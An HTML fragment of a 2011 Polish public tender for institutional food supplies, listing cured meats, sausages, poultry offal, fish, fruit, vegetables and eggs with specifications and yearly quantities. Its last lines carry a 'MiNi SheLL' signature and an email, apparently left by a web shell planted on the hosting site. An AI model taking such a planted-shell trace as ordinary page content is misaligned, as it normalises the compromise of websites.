5	Wątroba drobiowa świeża  -całe wątróbki bez pęcherzyków żółciowych, powierzchnia czysta, niepostrzępiona. Barwa jednolita, charakterystyczna dla tego produktu.	151	kg.	200
6	Żołądki drobiowe świeże -całe żołądki wypatroszone, bez przerostów tłuszczowych, powierzchnia niezakrwawiona, niepostrzępiona. Barwa  charakterystyczna dla tego rodzaju produktu.	151	kg.	140.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Mięso, wędliny i wyroby drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	CPV	Jm.	Średnia ilość na 12 m-cy
1	Baleron gotowany  powierzchnia czysta lekko wilgotna , konsystencja soczysta krucha. Niedopuszczalne skupiska galarety oraz wyciek soku podczas krojenia  Plaster grubości 3mm nie powinien się rozpadać. Wyrób umiarkowanie słony.	151	kg.	160
2	Boczek gotowany ekstra b/k- powierzchnia czysta lekko wilgotna , konsystencja soczysta krucha. Niedopuszczalne skupiska galarety oraz wyciek soku podczas krojenia oraz pozostałości kości. Plaster grubości 3mm nie powinien się rozpadać.  Wyrób umiarkowanie słony.	151	kg.	150
3	Flaki wołowe gotowane krojone w paski  	151	kg.	400
4	Karkówka b/k świeża-część zasadnicza wieprzowiny odcięta  z odcinka szyjnego półtuszy.	151	kg.	180
5	Kaszanka - wyrób w jelicie naturalnym wieprzowym lub w osłonce sztucznej. Konsystencja ścisła, dobrze związana.  Wyrób umiarkowanie słony.	151	kg.	400
6	Krupnioki-wyrób w jelicie naturalnym wieprzowym. Konsystencja ścisła, dobrze związana.  Wyrób umiarkowanie słony.	151	Kg 	20
7	Kiełbasa krakowska  wieprzowa -batony       w osłonkach sztucznych    o długości od 35cm-45cm i średnicy  od 80mm-100mm. Konsystencja ścisła, plastry grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony. 	151	kg.	70
8	Kiełbasa podwawelska                              w osłonkach naturalnych  średnio rozdrobnionych, wędzonych. Konsystencja ścisła. Plastry grubości 3mm  nie powinny rozpadać się. Wyrób umiarkowanie słony.	151	Kg 	70
9	Kiełbasa szynkowa- wieprzowa   batony w osłonkach sztucznych  o długości od 35cm-45cm i średnicy od 80mm-100mm. Konsystencja ścisła, plastry grubości 3mm nie powinny się rozpadać.  Wyrób umiarkowanie słony. 	151	kg.	250
10	Kiełbasa toruńska  w osłonkach naturalnych. Konsystencja ścisła , dość krucha, dobre związanie składników.  Wyrób średnio rozdrobniony , niedopuszczalne kawałki chrząstek.  Wyrób umiarkowanie słony.	151	kg.	170
11	Kiełbasa wiejska                                      w osłonkach naturalnych  średnio rozdrobnionych, wędzonych. Konsystencja ścisła. Plastry grubości 3mm  nie powinny rozpadać się. Wyczuwalne przyprawy: pieprz,  czosnek. Wyrób umiarkowanie słony.	151	kg.	200
12	Kiełbasa żywiecka batony                        w osłonkach sztucznych o długości od 35cm-45cm i średnicy  od 80mm-100mm. Konsystencja ścisła, plastry grubości 3mm nie powinny się rozpadać.  Wyrób umiarkowanie słony	151	kg.	60
13	Kości wieprzowe  pokrzepowe  od schabu lub karkówki klasa I.	151	kg.	1 600
14	Łopatka wieprzowa b/k  świeża -część zasadnicza wieprzowiny bez fałdu skóry, kości i bez tłuszczu. Powierzchnia niezakrwawiona, niepostrzępiona. Barwa mięśni jasnoróżowa do czerwonej.	151	kg.	630
15	Mortadela batony w osłonkach sztucznych. Konsystencja ścisła, elastyczna, plastry grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony.	151	kg.	55
16	Parówka cienka drobiowa w osłonkach naturalnych lub sztucznych o wadze jednej sztuki 100g. Wyrób umiarkowanie słony.	151	kg.	500
17	Parówka gruba wieprzowa  w osłonkach naturalnych lub sztucznych o wadze jednej sztuki 100g. Wyrób umiarkowanie słony.	151	kg.	200
18	Pasztet wiejski w osłonkach naturalnych. Konsystencja smarowna, dobrze związana, bez rozwarstwień składników. Wyrób umiarkowanie słony	151	Kg 	80
19	Pasztet pieczony z indyka -wyrób             w foremkach aluminiowych o wadze 500g, zapieczony. Konsystencja smarowna, dobrze związana, bez rozwarstwień składników. Wyrób umiarkowanie słony.	151	kg.	50
20	Polędwica drobiowa  -batony w osłonkach sztucznych o długości od 35cm-40cm i średnicy  od 80mm-100mm. Konsystencja ścisła, plastry grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony.	151	kg.	200
21	Polędwica wieprzowa sopocka -wędzony schab bez kości o barwie charakterystycznej dla wyrobu  / kolor złoty/. Konsystencja ścisła, plastry  grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony.	151	kg.	280
22	Rolada drobiowa  nadziewana farszem drobiowym z przyprawami. Konsystencja ścisła , plastry  grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony.	151	kg.	130
23	Salceson  domowy-wieprzowy wyrób          w osłonce sztucznej. Konsystencja soczysta. Plaster grubości 5mm nie powinien się rozpadać. Wyrób umiarkowanie słony.	151	kg.	70
24	Salceson drobiowy -wyrób w osłonce sztucznej. Konsystencja soczysta. Plaster grubości 5mm nie powinien się rozpadać.	151	kg.	250
25	Schab b/k świeży -część zasadnicza wieprzowiny odcięta od półtuszy bez kości  i tłuszczu. Powierzchnia niezakrwawiona, niepostrzępiona. Barwa mięśni jasnoróżowa do czerwonej.	151	kg.	160
26	Schab pieczony, wyrób wędzony, parzony, zapiekany. Wyprodukowany z peklowanego schabu wieprzowego  konsystencja soczysta. Plastry grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony.	151	Kg 	100
27	Słonina bez skóry  Wyrób barwy białej       o grubości  powyżej 2cm.	151	kg.	130
28	Szynka  wieprzowa parzona. Powierzchnia czysta, sucha. Konsystencja soczysta krucha, niedopuszczalne skupiska galarety na przekroju, oraz wyciek soku. Plastry grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony.	151	kg.	300
29	Szynka pieczona  -wyrób zapiekany w foremkach. Powierzchnia czysta, sucha. Konsystencja soczysta krucha, niedopuszczalne skupiska galarety na przekroju, oraz wyciek soku. Plastry grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony. .	151	kg.	105
30	Szynka z indyka  - batony w osłonkach sztucznych o długości od 35cm-40cm i średnicy  od 80mm-100mm. Konsystencja ścisła, plastry grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony. 	151	kg.	130
31	Wołowina b/k  świeża-mięso uzyskane z części udźca, bez kości i tłuszczu .Powierzchnia niezakrwawiona, niepostrzępiona. Barwa mięśni jasnoróżowa do czerwonej.	151	kg.	900
32	Żeberka wieprzowe  świeże klasa I .Słonina całkowicie odcięta. Powierzchnia niezakrwawiona, niepostrzępiona. Barwa mięśni jasnoróżowa do czerwonej.	151	kg.	230.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ryby i produkty rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	CPV	Jm.	Maksymalna ilość do
1	Filet  z pangi bez glazury  mrożony  metodą /shatter pack/(SHP)	152	kg.	340
2	Filet  z dorsza bez glazury mrożony metodą /shatter pack/ (SHP)    	152	Kg 	520
3	Filet z mintaja bez glazury  mrożony  metodą /shatter pack/(SHP)	152	kg.	270
4	Filet  z miruny bez glazury mrożony metodą /shatter pack/(SHP)	152	Kg 	200
5	Karp żywy /waga od 1,20kg-1,50kg/	152	kg.	40
6	Makrela w oleju 170g	152	Szt 	1 000
7	Makrela w pomidorach 170g	152	Szt	1 000
8	Ryba wędzona - makrela	152	kg.	180
9	Szprot w pomidorach  170g	152	Szt	1 000
10	Śledzie  marynowane w oleju. Opakowanie 2,50kg  lub 4kg.	152	kg.	200
11	Tuńczyk w sosie własnym w kawałkach 170g	152	Szt	160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	CPV	Jm.	Maksymalna ilość do
1	Arbuzy - (od VII-IX)	032	kg.	800
2	Banany	032	kg.	1 000
3	Borówki -(od VI-IX)	032	kg.	100
4	Brokuły - (od VI-XI)	032	Szt 	180
5	Brzoskwinie- (od VII-IX)	032	kg.	400
6	Buraki ćwikłowe	032	kg.	1 200
7	Cebula	032	kg.	500
8	Cytryny	032	kg.	1 800
9	Czereśnie -(od V-VII)	032	kg.	80
10	Czosnek	032	kg.	16
11	Fasola /Jaś/suszona	032	kg.	90
12	Fasola szparagowa -(od VI-X)	032	kg.	100
13	Groch /krakowiak/	032	kg.	3
14	Groch omielany	032	kg.	20
15	Gruszki -(VIII-XII)	032	kg.	200
16	Jabłka klasa I	032	kg.	6 700
17	Kalafior - (od VI-XI)	032	Szt.	700
18	Kapusta biała	032	kg.	650
19	Kapusta czerwona	032	kg.	100
20	Kapusta kiszona	153	kg.	850
21	Kapusta pekińska	032	Szt.	500
22	Kapusta włoska	032	kg.	20
23	Koper zielony w pęczkach	 032	Szt.	1 000
24	Maliny -(od VII-X)	032	Kg 	50
25	Mandarynki	032	kg.	400
26	Marchew	032	kg.	3 200
27	Natka pietruszki w pęczkach	032	Szt.	1 000
28	Nektarynki (od VII-IX)	011	kg.	500
29	Ogórki kiszone	153	kg.	130
30	Ogórki zielone -(/od V-IX)	032	kg.	420
31	Papryka czerwona  świeża	032	kg.	10
32	Pieczarki świeże	032	kg.	200
33	Pietruszka korzeń	032	kg.	750
34	Pomarańcze	032	kg.	1 300
35	Pomidory - ( od VI-X)	032	kg.	1 050
36	Pory	032	kg.	110
37	Porzeczki czarne -(od VII-IX)	032	kg.	60
38	Rzodkiewka  w pęczkach- (od V-IX)	032	Szt.	120
39	Sałata zielona - (od V-IX)	032	Szt.	250
40	Seler korzeń	032	kg.	1 000
41	Szczypiorek w pęczkach	032	Szt.	900
42	Śliwki-węgierka -(od VII-IX)	032	kg.	400
43	Truskawki -(od VI-VII)	032	kg.	550
44	Winogrona 	032	kg.	550
45	Wiśnie -(od VII-IX)	032	kg.	250
46	Ziemniaki jadalne odmiana sypka	032	kg.	13 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	CPV	Jm.	Średnia ilość na 12 m-cy
1	Jaja kurze wielkość / L/	031	Szt.	38 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com